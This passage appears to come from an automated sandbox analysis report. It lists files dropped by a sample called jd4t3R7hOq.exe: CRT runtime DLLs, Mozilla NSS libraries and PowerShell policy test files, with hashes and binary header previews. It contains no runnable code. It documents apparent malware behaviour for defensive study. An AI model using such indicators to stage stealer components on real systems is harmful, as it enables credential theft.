SSDEEP:	192:fiWIghWGZirX+4z123Ouo+Uggs/nGfe4pBjS/RFcpOWh0txKdmVWQ4GWs8ylDikh:aWPhWjO4Ri00GftpBjZOemSXlvNQ0
MD5:	A2F2258C32E3BA9ABF9E9E38EF7DA8C9
SHA1:	116846CA871114B7C54148AB2D968F364DA6142F
SHA-256:	565A2EEC5449EEEED68B430F2E9B92507F979174F9C9A71D0C36D58B96051C33
SHA-512:	E98CBC8D958E604EFFA614A3964B3D66B6FC646BDCA9AA679EA5E4EB92EC0497B91485A40742F3471F4FF10DE83122331699EDC56A50F06AE86F21FAD70953FE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...\|..O...........!......................... ...............................0......E*....@.............................e............ ..................8=..............T............................................................................text...u........................... ..`.rsrc........ ......................@..@v...................\|..O........9...d...d.......\|..O........d...............\|..O....................RSDS.X...7.......$k....api-ms-win-crt-locale-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg.......e....edata... ..`....rsrc$01....` .......rsrc$02....................\|..O....................8...........5...h...............E...................$...N...t...................$...D...b...!...R............... ...s...................:...k.......................9...X...................

C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-crt-math-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\jd4t3R7hOq.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	28984
Entropy (8bit):	6.6686462438397
Encrypted:	false
SSDEEP:	384:7OTEmbM4Oe5grykfIgTmLyWPhW30i00GftpBjAKemXlDbNl:dEMq5grxfInbRoiNeSp
MD5:	8B0BA750E7B15300482CE6C961A932F0
SHA1:	71A2F5D76D23E48CEF8F258EAAD63E586CFC0E19
SHA-256:	BECE7BAB83A5D0EC5C35F0841CBBF413E01AC878550FBDB34816ED55185DCFED
SHA-512:	FB646CDCDB462A347ED843312418F037F3212B2481F3897A16C22446824149EE96EB4A4B47A903CA27B1F4D7A352605D4930DF73092C380E3D4D77CE4E972C5A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!.........................@...............................P............@..............................+...........@...............4..8=..............T............................................................................text....,.......................... ..`.rsrc........@.......0..............@..@v...............................7...d...d...................d.......................................RSDSB...=........,....api-ms-win-crt-math-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg........+...edata...@..`....rsrc$01....`@.......rsrc$02................l.......:...:...(...................................(...@...X...q...............................4...M...g........................ ..= ..i ... ... ... ...!..E!..o!...!...!...!..."..F"..s"..."..."..."...#..E#..o#...#...#..

C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-crt-multibyte-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\jd4t3R7hOq.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	26424
Entropy (8bit):	6.712286643697659
Encrypted:	false
SSDEEP:	384:kDy+Kr6aLPmIHJI6/CpG3t2G3t4odXL5WPhWFY0i00GftpBjbnMxem8hzlmTMiLV:kDZKrZPmIHJI64GoiZMxe0V
MD5:	35FC66BD813D0F126883E695664E7B83
SHA1:	2FD63C18CC5DC4DEFC7EA82F421050E668F68548
SHA-256:	66ABF3A1147751C95689F5BC6A259E55281EC3D06D3332DD0BA464EFFA716735
SHA-512:	65F8397DE5C48D3DF8AD79BAF46C1D3A0761F727E918AE63612EA37D96ADF16CC76D70D454A599F37F9BA9B4E2E38EBC845DF4C74FC1E1131720FD0DCB881431
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....u'............!.....$...................@...............................P............@.............................. ...........@...............*..8=..............T............................................................................text....".......$.................. ..`.rsrc........@.......&..............@..@v....................u'.........<...d...d........u'.........d................u'.....................RSDS7.%..5..+...+.....api-ms-win-crt-multibyte-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg........ ...edata...@..`....rsrc$01....`@.......rsrc$02.....................u'.....................8...X...x...;...`.......................1...T...w...................'...L...q.......................B...e.......................7...Z...}...................+...L...m.......................

C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-crt-private-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\jd4t3R7hOq.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	73016
Entropy (8bit):	5.838702055399663
Encrypted:	false
SSDEEP:	1536:VAHEGlVDe5c4bFE2Jy2cvxXWpD9d3334BkZnkPFZo6kt:Vc7De5c4bFE2Jy2cvxXWpD9d3334BkZj
MD5:	9910A1BFDC41C5B39F6AF37F0A22AACD
SHA1:	47FA76778556F34A5E7910C816C78835109E4050
SHA-256:	65DED8D2CE159B2F5569F55B2CAF0E2C90F3694BD88C89DE790A15A49D8386B9
SHA-512:	A9788D0F8B3F61235EF4740724B4A0D8C0D3CF51F851C367CC9779AB07F208864A7F1B4A44255E0DE8E030D84B63B1BDB58F12C8C20455FF6A55EF6207B31A91
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....^1...........!................................................................R.....@.............................................................8=..............T............................................................................text............................... ..`.rsrc...............................@..@v.....................^1........:...d...d.........^1........d.................^1....................RSDS.J..w/.8..bu..3.....api-ms-win-crt-private-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata......`....rsrc$01....`........rsrc$02......................^1.....>..............8...h#...5...>...?..7?.._?...?...?...?...@..V@...@...@...@..+A..\A...A...A...A...B..LB...B...B...C..HC...C...C...C...C...D..HD...D...D...E..eE...E...E...F..1F..gF...F...F...G..BG..uG...G..

C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-crt-process-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\jd4t3R7hOq.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19256
Entropy (8bit):	7.076072254895036
Encrypted:	false
SSDEEP:	192:aRQqjd7dWIghWG4U9kuDz7M123Ouo+Uggs/nGfe4pBjSbAURWh0txKdmVWQ4CW+6:aKcWPhWFkDz6i00GftpBjYemZlUG+zIU
MD5:	8D02DD4C29BD490E672D271700511371
SHA1:	F3035A756E2E963764912C6B432E74615AE07011
SHA-256:	C03124BA691B187917BA79078C66E12CBF5387A3741203070BA23980AA471E8B
SHA-512:	D44EF51D3AAF42681659FFFFF4DD1A1957EAF4B8AB7BB798704102555DA127B9D7228580DCED4E0FC98C5F4026B1BAB242808E72A76E09726B0AF839E384C3B0
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...l.h............!......................... ...............................0.......U....@.............................x............ ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v...................l.h.........:...d...d.......l.h.........d...............l.h.....................RSDSZ\.qM..I....3.....api-ms-win-crt-process-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg.......x....edata... ..`....rsrc$01....` .......rsrc$02....................l.h.............$...$...8.......X...................&...@...Y...q...........................*...E..._...z.......................!...<...V...q...........................9...V...t.......................7...R...i...

C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-crt-runtime-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\jd4t3R7hOq.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	22840
Entropy (8bit):	6.942029615075195
Encrypted:	false
SSDEEP:	384:7b7hrKwWPhWFlsnhi00GftpBj+6em90lmTMiLzrF7:7bNrKxZnhoig6eQN7
MD5:	41A348F9BEDC8681FB30FA78E45EDB24
SHA1:	66E76C0574A549F293323DD6F863A8A5B54F3F9B
SHA-256:	C9BBC07A033BAB6A828ECC30648B501121586F6F53346B1CD0649D7B648EA60B
SHA-512:	8C2CB53CCF9719DE87EE65ED2E1947E266EC7E8343246DEF6429C6DF0DC514079F5171ACD1AA637276256C607F1063144494B992D4635B01E09DDEA6F5EEF204
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....L............!.........................0...............................@.......i....@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@v.....................L.........:...d...d.........L.........d.................L.....................RSDS6..>[d.=. ....C....api-ms-win-crt-runtime-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02......................L.....f.......k...k...8...............................4...S...s.......................E...g.......................)...N...n...................&...E...f...................'...D...j.......................>.......

C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-crt-stdio-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\jd4t3R7hOq.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	24368
Entropy (8bit):	6.873960147000383
Encrypted:	false
SSDEEP:	384:GZpFVhjWPhWxEi00GftpBjmjjem3Cl1z6h1r:eCfoi0espbr
MD5:	FEFB98394CB9EF4368DA798DEAB00E21
SHA1:	316D86926B558C9F3F6133739C1A8477B9E60740
SHA-256:	B1E702B840AEBE2E9244CD41512D158A43E6E9516CD2015A84EB962FA3FF0DF7
SHA-512:	57476FE9B546E4CAFB1EF4FD1CBD757385BA2D445D1785987AFB46298ACBE4B05266A0C4325868BC4245C2F41E7E2553585BFB5C70910E687F57DAC6A8E911E8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!.........................0...............................@.......)....@.............................a............0..............."..0=..............T............................................................................text...a........................... ..`.rsrc........0......................@..@v...............................8...d...d...................d.......................................RSDS...iS#.hg.....j....api-ms-win-crt-stdio-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg.......a....edata...0..`....rsrc$01....`0.......rsrc$02................^...............(....... ...................<...y...........)...h........... ...]...............H...............)...D...^...v...............................T...u.......................9...Z...{...................0...Q...

C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-crt-string-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\jd4t3R7hOq.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	23488
Entropy (8bit):	6.840671293766487
Encrypted:	false
SSDEEP:	384:5iFMx0C5yguNvZ5VQgx3SbwA7yMVIkFGlnWPhWGTi00GftpBjslem89lgC:56S5yguNvZ5VQgx3SbwA71IkFv5oialj
MD5:	404604CD100A1E60DFDAF6ECF5BA14C0
SHA1:	58469835AB4B916927B3CABF54AEE4F380FF6748
SHA-256:	73CC56F20268BFB329CCD891822E2E70DD70FE21FC7101DEB3FA30C34A08450C
SHA-512:	DA024CCB50D4A2A5355B7712BA896DF850CEE57AA4ADA33AAD0BAE6960BCD1E5E3CEE9488371AB6E19A2073508FBB3F0B257382713A31BC0947A4BF1F7A20BE4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......S...........!.........................0...............................@......B.....@..........................................0..............."...9..............T............................................................................text............................... ..`.rsrc........0......................@..@v......................S........9...d...d..........S........d..................S....................RSDSI.......$[~f..5....api-ms-win-crt-string-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.......................S....,...............8...........W...s.......................#...B...a...........................<...[...z.......................;...[...{................... ...A...b...........................<...X...r.......

C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-crt-time-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\jd4t3R7hOq.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20792
Entropy (8bit):	7.018061005886957
Encrypted:	false
SSDEEP:	384:8ZSWWVgWPhWFe3di00GftpBjnlfemHlUG+zITA+0:XRNoibernAA+0
MD5:	849F2C3EBF1FCBA33D16153692D5810F
SHA1:	1F8EDA52D31512EBFDD546BE60990B95C8E28BFB
SHA-256:	69885FD581641B4A680846F93C2DD21E5DD8E3BA37409783BC5B3160A919CB5D
SHA-512:	44DC4200A653363C9A1CB2BDD3DA5F371F7D1FB644D1CE2FF5FE57D939B35130AC8AE27A3F07B82B3428233F07F974628027B0E6B6F70F7B2A8D259BE95222F5
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....OI...........!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v....................OI........7...d...d........OI........d................OI....................RSDS...s..,E.w.9I..D....api-ms-win-crt-time-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.........OI............H...H...(...H...h... ...=...\...z.......................8...V...s.......................&...D...a...~.......................?...b.......................!...F...k.......................0...N...k...................

C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-crt-utility-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\jd4t3R7hOq.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18744
Entropy (8bit):	7.127951145819804
Encrypted:	false
SSDEEP:	192:QqfHQdu3WIghWG4U9lYdsNtL/123Ouo+Uggs/nGfe4pBjSb8Z9Wh0txKdmVWQ4Cg:/fBWPhWF+esnhi00GftpBjLBemHlP55q
MD5:	B52A0CA52C9C207874639B62B6082242
SHA1:	6FB845D6A82102FF74BD35F42A2844D8C450413B
SHA-256:	A1D1D6B0CB0A8421D7C0D1297C4C389C95514493CD0A386B49DC517AC1B9A2B0
SHA-512:	18834D89376D703BD461EDF7738EB723AD8D54CB92ACC9B6F10CBB55D63DB22C2A0F2F3067FE2CC6FEB775DB397030606608FF791A46BF048016A1333028D0A4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....!5............!......................... ...............................0.......4....@.............................^............ ..................8=..............T............................................................................text...n........................... ..`.rsrc........ ......................@..@v....................!5.........:...d...d........!5.........d................!5.....................RSDS............k.....api-ms-win-crt-utility-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg.......^....edata... ..`....rsrc$01....` .......rsrc$02.....................!5.....d...............8.......(...................#...<...U...l...............................+...@...[...r...................................4...I..._.......................3...N...e...\|.......................

C:\Users\user\AppData\Local\Temp\8F3E16B2\freebl3.dll

Download File

Process:	C:\Users\user\Desktop\jd4t3R7hOq.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	332752
Entropy (8bit):	6.8061257098244905
Encrypted:	false
SSDEEP:	6144:C+YBCxpjbRIDmvby5xDXlFVJM8PojGGHrIr1qqDL6XP+jW:Cu4Abg7XV72GI/qn6z
MD5:	343AA83574577727AABE537DCCFDEAFC
SHA1:	9CE3B9A182429C0DBA9821E2E72D3AB46F5D0A06
SHA-256:	393AE7F06FE6CD19EA6D57A93DD0ACD839EE39BA386CF1CA774C4C59A3BFEBD8
SHA-512:	827425D98BA491CD30929BEE6D658FCF537776CE96288180FE670FA6320C64177A7214FF4884AE3AA68E135070F28CA228AFB7F4012B724014BA7D106B5F0DCE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........./...AV..AV..AV...V..AV].@W..AV.1.V..AV].BW..AV].DW..AV].EW..AV..@W..AVO.@W..AV..@V.AVO.BW..AVO.EW..AVO.AW..AVO.V..AVO.CW..AVRich..AV........................PE..L......Z.........."!.........f...............................................p......o.....@.............................P...`........@..p....................P..........T...........................8...@...............8............................text...U........................... ..`.rdata..............................@..@.data...lH..........................@....rsrc...p....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\8F3E16B2\mozglue.dll

Download File

Process:	C:\Users\user\Desktop\jd4t3R7hOq.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	139216
Entropy (8bit):	6.841477908153926
Encrypted:	false
SSDEEP:	3072:8Oqe98Ea4usvd5jm6V0InXx/CHzGYC6NccMmxK3atIYHD2JJJsPyimY4kQkE:Vqe98Evua5Sm0ux/5YC6NccMmtXHD2JR
MD5:	9E682F1EB98A9D41468FC3E50F907635
SHA1:	85E0CECA36F657DDF6547AA0744F0855A27527EE
SHA-256:	830533BB569594EC2F7C07896B90225006B90A9AF108F49D6FB6BEBD02428B2D
SHA-512:	230230722D61AC1089FABF3F2DECFA04F9296498F8E2A2A49B1527797DCA67B5A11AB8656F04087ACADF873FA8976400D57C77C404EBA4AFF89D92B9986F32ED
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."yQ.f.?Mf.?Mf.?Mo`.Mv.?M.z>Lb.?M...Md.?M.z<Lh.?M.z;Lm.?M.z:Lu.?MDx>Lo.?Mf.>M..?M.{1Lu.?M.{?Lg.?M.{.Mg.?M.{=Lg.?MRichf.?M................PE..L......Z.........."!.........................................................@............@.............................\...L...,.... ..p....................0......p...T...............................@...................T...@....................text............................... ..`.rdata...b.......d..................@..@.data...............................@....rsrc...p.... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\8F3E16B2\msvcp140.dll

Download File

Process:	C:\Users\user\Desktop\jd4t3R7hOq.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	440120
Entropy (8bit):	6.652844702578311
Encrypted:	false
SSDEEP:	12288:Mlp4PwrPTlZ+/wKzY+dM+gjZ+UGhUgiW6QR7t5s03Ooc8dHkC2es9oV:Mlp4PePozGMA03Ooc8dHkC2ecI
MD5:	109F0F02FD37C84BFC7508D4227D7ED5
SHA1:	EF7420141BB15AC334D3964082361A460BFDB975
SHA-256:	334E69AC9367F708CE601A6F490FF227D6C20636DA5222F148B25831D22E13D4
SHA-512:	46EB62B65817365C249B48863D894B4669E20FCB3992E747CD5C9FDD57968E1B2CF7418D1C9340A89865EADDA362B8DB51947EB4427412EB83B35994F932FD39
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........V5=......A.....;........."...;......;......;.......;.......;......;.-....;......Rich...........PE..L....8'Y.........."!................P........ ......................................az....@A.........................C.......R..,....................x..8?......4:...f..8............................(..@............P.......@..@....................text...r........................... ..`.data....(... ......................@....idata..6....P....... ..............@..@.didat..4....p.......6..............@....rsrc................8..............@..@.reloc..4:.......<...<..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\8F3E16B2\nss3.dll

Download File

Process:	C:\Users\user\Desktop\jd4t3R7hOq.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1244112
Entropy (8bit):	6.809431682312062
Encrypted:	false
SSDEEP:	24576:XDI7I4/FeoJQuQ3IhXtHfjyqgJ0BnPQAib7/12bg2JSna5xfg0867U4MSpu731hn:uQ3YX5jyqgynPkbd24VwMSpu7Fhn
MD5:	556EA09421A0F74D31C4C0A89A70DC23
SHA1:	F739BA9B548EE64B13EB434A3130406D23F836E3
SHA-256:	F0E6210D4A0D48C7908D8D1C270449C91EB4523E312A61256833BFEAF699ABFB
SHA-512:	2481FC80DFFA8922569552C3C3EBAEF8D0341B80427447A14B291EC39EA62AB9C05A75E85EEF5EA7F857488CAB1463C18586F9B076E2958C5A314E459045EDE2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........x..c+..c+..c+...+..c++.b..c+lh.+..c++.`..c++.f..c++.g..c+.b..c+9.b..c+..b+..c+9.k..c+9.gC.c+9.c..c+9..+..c+9.a..c+Rich..c+................PE..L...a..Z.........."!................T........................................@............@.............................d....<..T.......h.......................t~..0...T...............................@............................................text............................... ..`.rdata...P.......R..................@..@.data....E...`... ...:..............@....rsrc...h............Z..............@..@.reloc..t~...........^..............@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\8F3E16B2\nssdbm3.dll

Download File

Process:	C:\Users\user\Desktop\jd4t3R7hOq.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	92624
Entropy (8bit):	6.639368309935547
Encrypted:	false
SSDEEP:	1536:5vNGVOt0VjOJkbH8femxfRVMNKBDuOQWL1421GlkxERC+ANcFZoZ/6tNRCwI41ZH:hNGVOiBZbcGmxXMcBqmzoCUZoZebHZMw
MD5:	569A7A65658A46F9412BDFA04F86E2B2
SHA1:	44CC0038E891AE73C43B61A71A46C97F98B1030D
SHA-256:	541A293C450E609810279F121A5E9DFA4E924D52E8B0C6C543512B5026EFE7EC
SHA-512:	C027B9D06C627026774195D3EAB72BD245EBBF5521CB769A4205E989B07CB4687993A47061FF6343E6EC1C059C3EC19664B52ED3A1100E6A78CFFB1C46472AFB
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Z.Y.4.Y.4.Y.4.P...U.4...5.[.4..y.Q.4...7.X.4...1.S.4...0.R.4.{.5.[.4...5.Z.4.Y.5...4...0.A.4...4.X.4....X.4...6.X.4.RichY.4.........................PE..L......Z.........."!.........0...............0............................................@..........................?.......@.......`..p............L.......p.......:..T...........................(;..@............0..X............................text............................... ..`.rdata..4....0... ..................@..@.data........P.......>..............@....rsrc...p....`.......@..............@..@.reloc.......p.......D..............@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\8F3E16B2\softokn3.dll

Download File

Process:	C:\Users\user\Desktop\jd4t3R7hOq.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	144336
Entropy (8bit):	6.5527585854849395
Encrypted:	false
SSDEEP:	3072:zAf6suip+z7FEk/oJz69sFaXeu9CoT2nIZvetBWqIBoE9Mv:Q6PpsF4CoT2EeY2eMv
MD5:	67827DB2380B5848166A411BAE9F0632
SHA1:	F68F1096C5A3F7B90824AA0F7B9DA372228363FF
SHA-256:	9A7F11C212D61856DFC494DE111911B7A6D9D5E9795B0B70BBBC998896F068AE
SHA-512:	910E15FD39B48CD13427526FDB702135A7164E1748A7EACCD6716BCB64B978FE333AC26FA8EBA73ED33BD32F2330D5C343FCD3F0FE2FFD7DF54DB89052DB7148
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l$...JO..JO..JO.u.O..JO?oKN..JO?oIN..JO?oON..JO?oNN..JO.mKN..JO-nKN..JO..KO~.JO-nNN..JO-nJN..JO-n.O..JO-nHN..JORich..JO........PE..L......Z.........."!.........`...............................................P......+Z....@..........................................0..p....................@..`.......T...........................(...@...............l............................text.............................. ..`.rdata...C.......D..................@..@.data........ ......................@....rsrc...p....0......................@..@.reloc..`....@......................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\8F3E16B2\ucrtbase.dll

Download File

Process:	C:\Users\user\Desktop\jd4t3R7hOq.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142072
Entropy (8bit):	6.809041027525523
Encrypted:	false
SSDEEP:	24576:bZBmnrh2YVAPROs7Bt/tX+/APcmcvIZPoy4TbK:FBmF2lIeaAPgb
MD5:	D6326267AE77655F312D2287903DB4D3
SHA1:	1268BEF8E2CA6EBC5FB974FDFAFF13BE5BA7574F
SHA-256:	0BB8C77DE80ACF9C43DE59A8FD75E611CC3EB8200C69F11E94389E8AF2CEB7A9
SHA-512:	11DB71D286E9DF01CB05ACEF0E639C307EFA3FEF8442E5A762407101640AC95F20BAD58F0A21A4DF7DBCDA268F934B996D9906434BF7E575C4382281028F64D4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........E..............o........p..................................................................Rich............................PE..L....3............!.....Z...........=.......p...............................p............@A........................`................................0..8=......$... ...T...........................H...@............................................text....Z.......Z.................. ..`.data........p.......^..............@....idata..6............l..............@..@.rsrc...............................@..@.reloc..$...........................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\8F3E16B2\vcruntime140.dll

Download File

Process:	C:\Users\user\Desktop\jd4t3R7hOq.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	83784
Entropy (8bit):	6.890347360270656
Encrypted:	false
SSDEEP:	1536:AQXQNgAuCDeHFtg3uYQkDqiVsv39niI35kU2yecbVKHHwhbfugbZyk:AQXQNVDeHFtO5d/A39ie6yecbVKHHwJF
MD5:	7587BF9CB4147022CD5681B015183046
SHA1:	F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628
SHA-256:	C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
SHA-512:	0B63E4979846CEBA1B1ED8470432EA6AA18CCA66B5F5322D17B14BC0DFA4B2EE09CA300A016E16A01DB5123E4E022820698F46D9BAD1078BD24675B4B181E91F
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........NE...E...E.....".G...L.^.N...E...l.......U.......V.......A......._.......D.....2.D.......D...RichE...........PE..L....8'Y.........."!......... ...............................................@............@A......................................... ..................H?...0..........8...............................@............................................text............................... ..`.data...D...........................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cg1b4vz2.sys.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l0j5kd5o.led.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mmpr5emy.fem.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sw2szdfs.eeu.ps1

Download File

